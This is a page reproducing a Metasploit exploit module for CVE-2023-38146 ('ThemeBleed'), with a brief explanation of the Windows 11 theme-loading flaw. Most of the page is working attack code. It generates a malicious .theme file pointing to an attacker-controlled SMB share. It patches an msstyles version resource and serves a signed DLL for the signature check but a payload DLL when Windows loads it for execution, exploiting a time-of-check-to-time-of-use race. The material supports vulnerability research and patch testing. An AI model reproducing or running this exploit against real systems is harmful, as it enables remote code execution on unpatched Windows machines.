Authored by Spencer McIntyre, bwatters-r7, gabe_k | Site metasploit.com

When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the msstyles file, and if that file’s PACKME_VERSION is 999, it then attempts to load an accompanying dll file ending in _vrf.dll. Before loading that file, it verifies that the file is signed. It does this by opening the file for reading and verifying the signature before opening the file for execution. Because this action is performed in two discrete operations, it opens the procedure for a time of check to time of use vulnerability. By embedding a UNC file path to an SMB server we control, the SMB server can serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name when the host intends to load/execute the dll.

advisories | CVE-2023-38146

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
include Msf::Exploit::Remote::SMB::Server::Share

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Themebleed- Windows 11 Themes Arbitrary Code Execution CVE-2023-38146',
'Description' => %q{
When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the
msstyles file, and if that file's PACKME_VERSION is `999`, it then attempts to load an accompanying dll
file ending in `_vrf.dll` Before loading that file, it verifies that the file is signed. It does this by
opening the file for reading and verifying the signature before opening the file for execution.
Because this action is performed in two discrete operations, it opens the procedure for a time of check to
time of use vulnerability. By embedding a UNC file path to an SMB server we control, the SMB server can
serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name
when the host intends to load/execute the dll.
},
'DisclosureDate' => '2023-09-13',
'Author' => [
'gabe_k', # Discovery/PoC
'bwatters-r7', # msf exploit
'Spencer McIntyre' # msf exploit
],
'References' => [
['CVE', '2023-38146'],
['URL', 'https://exploits.forsale/themebleed/'],
['URL', 'https://github.com/gabe-k/themebleed/tree/main']

],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X64,
'Targets' => [
[ 'Windows', {} ],
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],
'AKA' => ['ThemeBleed']

},
'DefaultOptions' => { 'DisablePayloadHandler' => false }
)
)

register_options([
OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).', '' ], regex: /.*w*.msstyles$/),
OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^w*(.msstyles)?$/),
OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ])
])

deregister_options(
'FILENAME', # this is the one used by the FILEFORMAT mixin, replaced by THEME_FILE_NAME for clarity
'FILE_NAME', # this is the one used by the SMB::Server::Share mixin, replaced by STYLE_FILE_NAME for clarity
'FOLDER_NAME'
)
end

def file_format_filename
datastore['THEME_FILE_NAME']
end

def setup
super

@file = File.binread(datastore['STYLE_FILE'])
begin
pe = Rex::PeParsey::Pe.new_from_string(@file)
rescue Rex::PeParsey::PeError => e
fail_with(Failure::BadConfig, "Failed to parse the STYLE_FILE: #{e}")
end

unless pe.resources && (rva = pe.resources['/PACKTHEM_VERSION/0/0']&.rva)
fail_with(Failure::BadConfig, 'The STYLE_FILE has no PACKTHEM_VERSION resource.')
end
@file_version_offset = pe.rva_to_file_offset(rva)

@file_name = datastore['STYLE_FILE_NAME'].blank? ? Rex::Text.rand_text_alpha(rand(4..6)) : datastore['STYLE_FILE_NAME']
@file_name << '.msstyles' unless @file_name.end_with?('.msstyles')
end

def primer
payload_dll = generate_payload_dll
max_length = [payload_dll.length, @file.length].max
# make sure that the lengths are the same by padding the smaller to the length of the larger
@file.ljust(max_length, "x00".b)
payload_dll.ljust(max_length, "x00".b)

virtual_disk = service.shares[@share]
@service = service

virtual_file = ThreadLocalVirtualStaticFile.new(virtual_disk, "/#{@file_name}_vrf.dll", @file)
virtual_disk.add(virtual_file)
# install this hook for create requests to set the thread-local file content
virtual_disk.add_hook(RubySMB::SMB2::Packet::CreateRequest) do |_session, request|
next unless request.name.read_now!.encode.ends_with?('_vrf.dll')

if request.desired_access.execute == 1
virtual_file.tl_content = payload_dll
else
virtual_file.tl_content = @file
end

nil
end

file_create(make_theme)
end

def get_file_contents(client:)
print_status("Sending file to #{client.peerhost}")
new_version = [999].pack('v')
@file[0...@file_version_offset] + new_version + @file[(@file_version_offset + new_version.length)...]
end

def make_theme
<<~THEME
[Theme]
DisplayName=@%SystemRoot%System32themeui.dll,-2060

[Control PanelDesktop]
Wallpaper=%SystemRoot%webwallpaperWindowsimg0.jpg
TileWallpaper=0
WallpaperStyle=10

[VisualStyles]
Path=\#{datastore['SRVHOST']}#{@share}#{@file_name}
ColorStyle=NormalColor
Size=NormalSize

[MasterThemeSelector]
MTSM=RJSPBS
THEME
end

class ThreadLocalVirtualStaticFile < RubySMB::Server::Share::Provider::VirtualDisk::VirtualStaticFile
def initialize(*args, **kwargs)
super
@default_content = @content
@tl_content = {}
@tl_content.compare_by_identity
end

def open(mode = 'r', &block)
@content = tl_content
super
end

def tl_content=(content)
@tl_content[Thread.current] = content
end

def tl_content
@tl_content.fetch(Thread.current, @default_content)
end
end
end